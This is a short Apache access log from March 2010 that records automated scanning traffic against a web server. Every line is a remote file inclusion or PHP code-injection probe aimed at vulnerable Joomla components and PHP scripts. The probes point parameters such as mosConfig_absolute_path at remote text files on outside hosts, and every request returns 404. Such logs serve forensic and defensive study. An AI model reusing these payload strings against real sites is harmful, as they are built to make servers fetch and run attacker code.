195.9.14.88 - - [19/Mar/2010:01:21:45 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.121.63.153 - - [19/Mar/2010:01:21:46 -0400] "GET /logs/error_log.Q110020100/index2.php?showpage=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:21:51 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:22:47 -0400] "GET /logs/access_log.Q110020200%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
78.110.50.114 - - [19/Mar/2010:01:23:04 -0400] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:23:06 -0400] "GET /logs/access_log.Q110020200%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:23:23 -0400] "GET /logs/access_log.Q110020200%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:23:25 -0400] "GET /logs/access_log.Q110020200%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:01:23:35 -0400] "GET /logs/access_log.Q110020200%20%20//download.php?board.skin.path=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:01:23:37 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
